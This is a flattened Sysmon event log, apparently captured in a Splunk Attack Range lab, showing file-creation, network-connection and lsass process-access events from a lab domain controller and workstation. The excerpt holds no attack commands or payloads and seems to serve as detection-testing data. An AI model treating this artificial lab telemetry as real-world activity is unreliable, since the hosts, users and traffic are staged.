07:44:09.363{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F050D7563C05EE8887BB2FA605C8037,SHA256=EE9CFE2A6AB887087B4C3FB01C85936BB8B1FD021BD1ACF824A2932B2240DD91,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045969Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:09.109{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6C94923BC9E6A187890440AF5FF0216,SHA256=6322E0513F878E15CC471CB8F536FFAB019A0A14F66850E29E84CEB7B8221682,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806051Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:10.395{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5668137374DDA43F4850642CCF353E6D,SHA256=21CB6A1F04CBFFDA2144C3E25A5600D6E661F812446FB2A1CF30D3F47138232A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045971Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:10.807{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-02AB-60E8-0100-00000000CF01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x80000000000000001045970Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:10.123{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C75762C31D2F8A9508B9EC8DE0377E9A,SHA256=79CB4F5CDC797E83B67959643D0335FCE89DC17A333D2C3BF0A1246EBB33E2F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806055Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:11.441{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1257DF19DFB269C60AE3D84487BC90BB,SHA256=0ADFC8AF63516368EDAF252723F7ED42192E43F01EDD39AFFF74C557BEBBDCDA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045978Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:04.251{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50905-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001045977Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:04.251{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50905-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 23542300x80000000000000001045976Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:11.722{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B9ABE4F4CAEFDC527840058A6E15FD56,SHA256=AD6FCE8A29DB3BC23D05737B30262E38A69800DF9BE436C09D6838EB22680B97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045975Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:11.722{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D0254C31A1A63D6EC0FC257B6F370D30,SHA256=0E69469BAE4A8351551C7D15468D8B25F2E59F97599CEE22219FC7144C98917D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045974Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:03.891{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57155-false10.0.1.14win-dc-890.attackrange.local49676- 354300x80000000000000001045973Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:03.810{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50904-false10.0.1.12-8000- 23542300x80000000000000001045972Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:11.138{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B7C8767F43A9270CEB159CCA760D3E8,SHA256=5BDE3AB5D8425F2C4303C2F62904531942F750589F9FE079432D52AD9682FAC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806054Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:11.348{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D585CE5E9B65BB526C064D826E460672,SHA256=41196DF8BC374D71A5ED3FCD1A2FE9C85BD5EDF0E17B4D870C6BA598ACAFE066,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806053Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:11.348{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8144061D94BE60169DD3A6AABA4C8C89,SHA256=B902A100C46DDCA510FE94EB5FF14DF5FB36E5C371A246F037EC7A3F9B2895D8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806052Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:09.215{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57154-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806057Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:12.473{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04D2DF01C27C275041CAC6AD7547C96B,SHA256=A783644B3C097F2144F7E1D684EAC390C6874D2FC17161DCD7CA792DF1D2DB96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045979Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:12.153{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D505DBA3BC9155AB44036A8F5144DC1,SHA256=5B41486B9DC22A34E724526AB010EEF86C8976F889C7094B98FF4200753B1FC1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806056Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:10.181{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-38730-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000806059Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:13.504{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2DF4F9BB1062400367968C77344B4D6,SHA256=C867894929327CD3FEF8A52A787A17B4E16E05E0AA8CFDF0E9665C007E079885,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045988Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:04.370{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50909-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 354300x80000000000000001045987Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:04.370{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50909-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 354300x80000000000000001045986Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:04.367{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50908-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local49666- 354300x80000000000000001045985Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:04.367{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50908-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local49666- 354300x80000000000000001045984Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:04.366{466BC892-02AF-60E8-0D00-00000000CF01}900C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50907-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 354300x80000000000000001045983Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:04.366{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50907-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 354300x80000000000000001045982Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:04.259{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-890.attackrange.local50906-false10.0.1.14win-dc-890.attackrange.local389ldap 354300x80000000000000001045981Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:04.259{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50906-false10.0.1.14win-dc-890.attackrange.local389ldap 23542300x80000000000000001045980Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:13.160{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=337489B19ADDAF0A184C30B1A08F01CC,SHA256=187FDC34F38AE2860CB8C8EFDAD0710510AF7EFD4915DB1F9F112CE8CA153567,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806058Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:10.487{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57155-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x8000000000000000806060Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:14.526{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98D3547F54185C4FBF9D2FF21656A418,SHA256=5D118B88A7E44FB1368784639D34E4BD778B5702794E29E9481E301D69FC92D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045989Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:14.196{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94EBECD9DF45ADC106EA726FAF5D04A5,SHA256=CDD4309CCB5DF9D8AE90763293457D4DA77D89B76BB5143DACA59058603CFD9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806061Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:15.542{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F0D662D18753E6F2A07F24E522F5B31,SHA256=52C857DDF1ADFFC72C07E2A0F9DCCF346CEA3057C094C8D7EB90CB4D585D597E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045991Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:15.357{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B9ABE4F4CAEFDC527840058A6E15FD56,SHA256=AD6FCE8A29DB3BC23D05737B30262E38A69800DF9BE436C09D6838EB22680B97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045990Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:15.210{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF3AB04038C96EC5D0BC0A916EAE956D,SHA256=2941C87323506F2808444D1E81BEB6917C0ECD03107D982FF785E9290643B66C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806062Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:16.636{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6C163C47073A610748B0B041CA23ABA,SHA256=B3C2F86F1032BB0595E612FBA98D7457F646452BFC7B7DEAAF4EB1B08E72F0F6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045994Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:07.883{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local50910-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001045993Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:07.883{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local50910-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001045992Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:16.225{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=542524A53F620CA327E9B620998A9F9C,SHA256=8D2817591AAF519C35D2D34BE638F6333BB831C1681653A54481D0F4D28F6D34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806064Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:17.651{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D01ED1FA7F231DD8D4D2708417E6E53E,SHA256=FAAD1C91802696EDAD4143D52650D8CE64FCD4FE9BB418593845AEF0316B9BF4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045996Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:09.812{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50911-false10.0.1.12-8000- 23542300x80000000000000001045995Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:17.240{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFA9A66F9F9521BC0E7B8116D5D1CBBC,SHA256=DF2F551148DCD5FAD453F407DE63BECF90AD6F5FCB6228B71FAB7F12AC9AA832,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806063Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:15.191{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57156-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806065Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:18.730{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA31593DB1BE467AB69E009FBA585047,SHA256=0A86591B44872674AA095F003466685D7B10F40FC77496B6A8736D7BC4D706B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045998Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:18.254{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A33DCD40E04E1B095F436ADE8576E554,SHA256=D3B10DAC36F18A5CE4C75ED64E35263616923912BE17D743F173C616B5BB1EDA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045997Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:18.192{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806066Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:19.730{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C00118FAAFB2292B6759E4EC07DB51BA,SHA256=694BE508649C568D0D0410FB3F447D4B94411B1B9FC62396819CCD9D0D801E95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045999Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:19.272{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71FFC98216B8186FD1D417F617A1E2AD,SHA256=B068ED4B1D1D5761FC3A8B39454836090FCC23CB58699FFA1B31DDB30AE1EA89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806068Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:20.745{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=083E3CAC5DE3E3D0AAC44801B36C0D93,SHA256=460026F4EAD1EDD198F2597242ECCB28600366F727EEB8A7634329802568DCC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046000Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:20.292{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E01DF148C56DEEBEEC1B50AA263958E,SHA256=5C368C3B93DE4CA8CBAB8FCD61C3C93BE307A65BFB58B68EFC92DB0CC434D64B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806067Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:20.323{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806069Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:21.761{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7ECEA9461A10948806661781FB8E1FB2,SHA256=B47C0E2CDAA731C999112513A1C360E774DF1BF3C7433399F5CDE78E864B87E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046001Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:21.322{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02A4661A124AF2EA0CEED4A03A3D0AAB,SHA256=311168A0810ADE3D9D4CE7CD6D5C7C96C95DB2AD9D9AEAC4E918470BC8E1446A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806072Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:22.776{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=236090CE0B22C4BF5782261EB9CBB2B7,SHA256=3DC5E4D64C4DB1A870880318E125C3023F72EC5842886E4A7790067ED7B6DC5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046004Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:22.539{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=584A2ECFD1AF641152B1951EDA786592,SHA256=0594C17B0D1896C2069894E5950507802787E693BBE9B69D1A39698A2EFA6674,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046003Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:22.539{466BC892-02CE-60E8-7600-00000000CF01}3400NT 